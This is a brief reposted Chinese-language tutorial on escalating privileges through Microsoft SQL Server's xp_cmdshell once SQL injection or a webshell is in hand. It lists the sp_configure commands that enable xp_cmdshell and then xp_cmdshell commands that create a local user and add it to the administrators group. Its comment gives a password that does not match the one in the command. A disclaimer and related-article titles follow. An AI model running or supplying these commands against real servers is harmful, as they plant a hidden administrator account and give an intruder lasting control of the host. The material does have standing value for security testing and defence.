0x01 前提

getshell或者存在sql注入並且能夠執行命令。
sql server是system權限，sql server默認就是system權限。

0x02 xp_cmdshell

有了xp_cmdshell的話可以執行系統命令，該組件默認是關閉的，因此需要把它打開。

開啟xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;

關閉xp_cmdshell

exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell', 0;reconfigure

0x03 提權

exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用戶test，密碼test
exec master..xp_cmdshell 'net localgroup administrators test add'    添加test用戶到管理員組

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 MSSQL提權之xp_cmdshell MSSQL提權之xp_cmdshell、SP_OACreate、沙盒提權 SQL Server如何啟用xp_cmdshell組件 SQL Server 阻止組件 xp_cmdshell 數據庫xp_cmdshell使用 XP_CMDSHELL 執行命令添加 windows 用戶的方法通過Mssql提權的幾種姿勢執行存儲過程SQL Server阻止了對組件xp_cmdshell過程的解決方案在執行 xp_cmdshell 的過程中出錯。調用 'CreateProcess' 失敗,錯誤代碼: '5 [ERROR]pyodbc.ProgrammingError: ('42000', '[42000] [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]SQL Server 阻止了對組件“xp_cmdshell”的過程“sys.xp_cmdshell”的訪問